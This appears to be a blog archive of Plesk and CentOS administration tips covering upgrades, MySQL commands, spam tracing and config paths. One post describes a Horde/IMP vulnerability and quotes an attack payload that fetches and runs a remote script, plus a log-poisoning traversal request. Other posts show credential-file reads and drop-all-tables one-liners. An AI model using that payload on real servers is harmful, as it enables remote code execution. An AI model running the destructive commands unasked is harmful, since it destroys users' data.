Category Archives: Plesk

Plesk upgrade to the latest stable version — Centos 5.x 64 bit arch

— Plesk can be upgraded upto version 9.5.4 either from Plesk control
Panel or by using the following script :

# /usr/local/psa/admin/bin/autoinstaller

— Till this version, its pretty straightforward.

— But when trying to upgrade to a version higher with a PHP
version < 5.3, you will face issues. -- We are now trying to Upgrade Plesk using the stock CentOS repo's and do not depend on any 3rd Party repo's including the trusted atomic. -- From the version 9.5.4, do an installation again, selecting the same version number (9.5.4) # /usr/local/psa/admin/bin/autoinstaller

# After selecting the version from the installation menu, you will find such a screen in the
next page :

Please select the components of Parallels Plesk Panel you want to install:
………
………

Different PHP interpreter versions
14. (*) PHP5 support
15. ( ) PHP5.3 support

— From this select ’15. ( ) PHP5.3 support’ and proceed with the installation.

— At the end of this installation, you will get Plesk 9.5.4 with PHP 5.3 support,
which means you will have the PHP required to upgrade to the next level,
without any further repo’s

— Although this is the case, when you try to check the PHP version,
you will get something like this :

PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib64/php/
modules/sqlite.so' - /usr/lib64/php/modules /sqlite.so: cannot open shared
object file: No such file or directory in Unknown on line 0

— Ignore this error for the moment

— Upgrade Plesk to 11.5 using the auto-installer.

— There should not be errors ( in usual cases), other than the license error which can
be ignored.

— Once Upgrade is completed, we will have to fix the issue with sqlite.so.

# yum list php*sqlite*

— This is acutally a bug in Plesk that this module comes with the 32-bit arch, even
if the CentOS arch is 64-bit and all other modules are installed as 64 bit.

— To get around this, remove the rpm ‘php53-sqlite2’ and install a 64-bit arch one
from RHEL/CentOS

— Remove it using the command,

# rpm -e --nodeps php53-sqlite2 ( Dont remove using YUM or without ‘–nodeps’ option )

— Download and install the 64bit arch package

# wget http://plesk-autoinstall.mirror.serverloft.eu/PSA_10.1.1/
dist-rpm-RedHat-el5-x86_64/opt/php53/php53-sqlite2-5.3.2-11011812.x86_64.rpm

— Run the following command to install the Package :

# rpm -i php53-sqlite2-5.3.2-11011812.x86_64.rpm

— Check php -v and ensure things are fine.

Apache error_log – piling up with PHP errors ?

Is error_log associated with a domain piling up in huge size ?

Check the contents of it and see if its something like this :

=============

[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JDispatcher::getInstance() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::load() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::register() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JPluginHelper::_import() should not be called statically in
[07-Feb-2014 00:19:15 America/New_York] PHP Strict Standards: Non-static method JLoader::import() should not be called statically in

……….
……….

=============

We can see that it is reporting PHP Strict-Standards errors.
As each and every strict standard errors is being reported,
error_log is consuming huge amount of space.

This is a change which has been seen in the newer version of PHP, ( PHP 5.4 )
which now reports E_STRICT errors on default.

To get around this issue, disable error reporting for strict standards,
by adding the below line to PHP configuration file.

error_reporting = E_ALL & ~E_NOTICE & ~E_STRICT

Useful MySQL commands

To find MySQL root/admin pass :

cPanel server           : cat /root/.my.cnf ( username : root )
Plesk server             : cat /etc/psa/.psa.shadow ( username : admin )
DirectAdmin server  : cat /usr/local/directadmin/conf/mysql.conf

To login to MySQL :

mysql -u 'username' -p ( will prompt for password )
Password:

To create MySQL dump of a database :

mysqldump -u 'username' -p dbname > database_name.sql ( will prompt for password )

To create MySQL dump of all databases :

mysqldump -u 'username' -p --all-databases > all_databases.sql ( will prompt for password )

To restore all databases from the MySQL dump :

mysql -u username -p < all_databases.sql ( will prompt for password )

To restore a MySQL dump for a database :

mysql -u 'username' -p dbname < database_name.sql ( will prompt for password )

To restore a single database from dump of all databases :

mysql -u 'username' -p --one-database dbname < all_databases.sql ( will prompt for password )

To create MySQL dump of a single table in a database :

mysqldump -u 'username' -p dbname table_name > table_name.sql ( will prompt for password )

To restore the above table from MySQL dump :

mysql -u 'username' -p dbname < /path/to/table_name.sql ( will prompt for password )

One liner to truncate all tables in a db from MySQL :

mysql -Nse 'show tables' DBNAME | while read table;
do mysql -e "truncate table $table" DBNAME; done

One liner to drop all tables in a db from MySQL :

mysql -Nse 'show tables' DBNAME | while read table;
do mysql -e "drop table $table" DBNAME; done

MySQL server not starting ?

There are ton’s of causes for which MySQL might not start,
ranging from disk space full to databases getting corrupt.

First place where you have to check for a clue is the .err log
( /var/lib/mysql/hostname.err )

If the err corresponds to something like this :

InnoDB: End of page dump
140104 12:33:19 InnoDB: Page checksum 2288969011, prior-to-4.0.14-form checksum 2949853821
InnoDB: stored checksum 492713095, prior-to-4.0.14-form stored checksum 2949853821
InnoDB: Page lsn 0 40542, low 4 bytes of lsn at page end 40542
InnoDB: Page number (if stored to page already) 47,
InnoDB: space id (if created with >= MySQL-4.1.1 and stored already) 0
InnoDB: Page may be an update undo log page
InnoDB: Page may be an index page where index id is 12
InnoDB: Also the page in the doublewrite buffer is corrupt.
InnoDB: Cannot continue operation.
InnoDB: You can try to recover the database with the my.cnf
InnoDB: option:
InnoDB: innodb_force_recovery=6

One of the reason for this error is the use of multiple
storage engines, MyISAM or InnoDB

Check your /etc/my.cnf for any lines which highlight the use
of multiple storage engines.

Following can be an example :

innodb_force_recovery=4
default-storage-engine=MyISAM

The above configuration implies MyISAM is the default
storage engine, but another setting related to innoDB is
already given, which conflicts.

If your default storage engine is MyISAM, then
giving the following option in /etc/my.cnf would
help : skip-innodb

A vulnerability with older versions of Horde/IMP in Plesk !

The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:

<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;

perl new.txt;rm -rf new.txt"); ?>

This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:

/horde/util/barcode.php?type=../../../../../../../../../../../

var/log/psa-horde/psa-horde.log

Here is what the actual requests the attacker uses and the log entry from the psa-horde.log
file would look like:

xx.xx.xx.xx - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php

HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5)

Gecko/20091102 Firefox/3.5.5"

xx.xx.xx.xx - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?

Resolution

Resolution as suggested by parallels is downloading the patch for Horde and place it in
/usr/share/psa-horde/lib/Horde/

Patch can be obtained from :

http://kb.parallels.com/Attachments/19039/Attachments/patch%20Horde%203.1.7.zip

An alias to a subdomain ? — Plesk

Need a domain alias for a sub-domain?
Plesk had a direct option to do this from the front end, which was
taken out in newer versions of Plesk.

You can configure a .com alias to a subdomain by :
create a file in the subdomains conf directly like this:
# vi /var/www/vhost/yoursite.com/subdomains/foo/conf/vhost.conf

contents:
ServerAlias "newaliasname.com"
ServerAlias "www.newaliasname.com"

then rebuild apache config like:
# /opt/psa/admin/sbin/httpdmng --reconfigure-all

Named service failing in Plesk ?

Issue with named service :

When trying to restart named, you get an error stating some parameter is not given correctly in a zone file.

It would be a reverse PTR zone file with name something like this:
x.x.x.in-addr.arpa

Open the zone file using vim ,

# vim /var/named/run-root/var/72.200.xx.in-addr.arpa.db

When you check the file you can see a mis-configuration in a particular line
when compared with other lines. You can easily spot that with your naked eye.

Edit that misconfigured line (check how other lines are written ) and save it and restart
named service.

This is a bug which is seen in some older versions of Plesk.

Install SSL for a domain in Plesk

Note that for installing SSL certificate, the domain should be assigned a dedicated IP address.

Both setting up IP address and installing SSL certificate can be done from the Plesk panel. Steps to install certificate is as given:

– Log in to Parallels Plesk Panel.
– From the menu on the left, select Domains.
– Click on the domain name that the certificate is issued for.
– Click SSL Certificates.
– Click Browse and locate your signed SSL certificate.
– Select it, then select Send File. This uploads and installs the certificate against the corresponding private key.
– Click the name of the certificate.
– Open the certificate bundle in a text editor and copy and paste its contents into the box labeled CA Certificate.
– Click Send Text.

 

Find the source of Spamming – Plesk !!

Check how many messages are in the queue with Qmail

# /var/qmail/bin/qmail-qstat

If mail is being sent by an authorized user but not from the PHP script, you can run the command below to find the user that has sent the most messages :

// Note that you must have the ‘SMTP authorization’ activated on the server to see these records //

# cat /usr/local/psa/var/log/maillog |grep -I smtp_auth |grep -I user |awk ‘{print $11}’ |sort |uniq -c |sort -n

The next step is to use “qmail-qread,” which can be used to read the message headers:

# /var/qmail/bin/qmail-qread

This shows the senders and recipients of messages. If the message contains too many recipients, probably this is spam. Now try to find this message in the queue by its ID
# find /var/qmail/queue/mess/ -name 2996948 ( <- Message ID )

Examine the message and find the line “Received” to find out from where it was sent for the first time. For example, if you find:

Received: (qmail 19514 invoked by uid 10003); 13 Sep 2005 17:48:22 +0700

It means that this message was sent via a CGI by user with UID 10003. Using this UID, it is possible to find the domain:

# grep 10003 /etc/passwd

Now, to determine from what folder the PHP script that sends mail was run :

Create a /var/qmail/bin/sendmail-wrapper script with the following content:

#!/bin/sh
(echo X-Additional-Header: $PWD ;cat) | tee -a /var/tmp/mail.send|/var/qmail/bin/sendmail-qmail "$@"

Create a log file /var/tmp/mail.send and grant it “a+rw” rights; make the wrapper executable; rename old sendmail; and link it to the new wrapper:
~# touch /var/tmp/mail.send
~# chmod a+rw /var/tmp/mail.send
~# chmod a+x /var/qmail/bin/sendmail-wrapper
~# mv /var/qmail/bin/sendmail /var/qmail/bin/sendmail-qmail
~# ln -s /var/qmail/bin/sendmail-wrapper /var/qmail/bin/sendmail

Now wait for some time for logs to be generated, then :

~# rm -f /var/qmail/bin/sendmail
~# mv /var/qmail/bin/sendmail-qmail /var/qmail/bin/sendmail

Examine the /var/tmp/mail.send file. There should be lines starting with “X-Additional-Header:” pointing to domain folders where the scripts                                      which sent the mail are located.

You can see all the folders from where mail PHP scripts were run with the following command:

~# grep X-Additional /var/tmp/mail.send | grep `cat /etc/psa/psa.conf | grep HTTPD_VHOSTS_D | sed -e 's/HTTPD_VHOSTS_D//' `

# Another case of spamming

When checking the qmail maillogs (usr/local/psa/var/log/maillog) if we find something
similar to this :

Oct 8 00:17:00 xxxx smtp_auth: SMTP connect from (null)@(null) [xx.xx.xx.xx]
Oct 8 00:17:00 xxxx smtp_auth: smtp_auth: SMTP user xxxxx: logged in from (null)@(null) [xx.xx.xx.xx]

We can confirm that  spamming is being done by brute forcing Plesk
email passwords and then authenticating using base 64 encoding on the username.

The built in qmail logging cannot handle this encoding and as a result the logs will just show (null) instead of the username used.

From parallels forums :
http://forum.parallels.com/showthread.p ... il-logging
http://forum.parallels.com/pda/index.php/t-82043.html

The only solution would be to upgrade Plesk to a more stable version.

 

Configure log rotation in Plesk

Configuration of Log rotation of Plesk system logs >> /etc/psa/logrotate.conf 

Configuration of Log rotation of Domain logs >> /usr/local/psa/etc/logrotate.d/

You can also configure in the front end :

Select domains>>select the option “open in control panel” for any particular domain.
Look for the option advanced options towards the end and select log rotation.

Welcome to Plesk – The basics

Login to the Plesk control panel :
➡ http(s)://IP : port 8442 or 8443

Create domain from
➡ hosting services>>customers>>add new customers

Login to end user side of plesk
➡ hosting services>>domains>>click open in control panel

To create mail accounts
➡ mail>>create email address

To create ftp accounts
➡ websites and domains>>ftp access>>create additional ftp account

To upload file
➡ websites and domains>>file manager

To check the dns records
➡ websites and domains>>dns settings

To add subdomain, add-on-domain and parked domains
➡ websites & domains –> bottom you have options for adding new domain (you need to be reseller)
➡ add a new subdomain
➡ add a new domain alias which is same as parked domain
➡ In order to give addon domain give as new domain alias and create a vhost entry for it

To create mysql user and other database related stuffs
➡ websites & domain>>databases>>add new database
➡ once the db has been created the user can be created
➡ click on the db>>add new database user
➡ db can be managed by the web interface “webadmin” from tools which is similar to phpmyadmin in cpanel
to grant all privilages, select the user and set it default for the db

To add spf
➡ website & domain>>dns settings>>add record>> and record type as txt
now add txt record and update the setting

To set cronjob
➡ websites & domains>>show advanced operations>>scheduled tasks

Forwarding and spam filter
➡ mail>>either create or modify new email address
in that u see two tabs as “forwarding” and “spam filter”

To change the password
➡ users>>click on the users and change settings

To take backup
➡ websites & domains>>backup manager

Backend files

➡ Plesk root directory : /usr/local/psa
➡ Version : /usr/local/psa/version
➡ Admin password is stored : /etc/psa/.psa.shadow
➡ Plesk configuration file : /etc/psa/psa.conf
➡ Restart Plesk : /etc/rc.d/init.d/plesk restart
➡ Main httpd configuration file : /etc/httpd/conf/httpd.conf
➡ Plesk httpd : /etc/httpd/conf.d/zz010_psa_httpd.conf
➡ Include conf files are under : /etc/httpd/conf.d
➡ Startup script for plesk apache : /usr/local/psa/admin/bin/httpsdctl start
➡ Apache main log files under : /var/log/httpd
➡ Php configuration file : /etc/php.ini
➡ Php extension modules are taken from : /etc/php.d
➡ Named Conf file located : /var/named/run-root/etc/named.conf
➡ DB record : /var/named/run-root/var/domain.com
➡ Log file : /var/log/messages
➡ Service to restart : /etc/init.d/named restart
➡ FTP Conf file : /etc/proftpd.conf
➡ Databases are located at : /var/lib/mysql
➡ Configuration file : /etc/my.cnf
➡ Mysql log : /var/log/mysqld.log
➡ Location of qmail directory : /var/qmail
➡ Mail directory of a domain : /var/qmail/mailnames/domain.com
➡ Mail log : /var/log/maillog or /usr/local/psa/var/log/maillog
➡ Home directory : /var/www/vhosts/domain.com
➡ Document root directory of a domain : /var/www/vhosts/domain.com/httpdocs
➡ Document root directory of secure website : /var/www/vhosts/domain.com/httpdsdocs
➡ Subdomains are created under : /var/www/vhosts/domain.com/subdomains
➡ Domain specific logs are under : /var/www/vhosts/domain.com/statistics/logs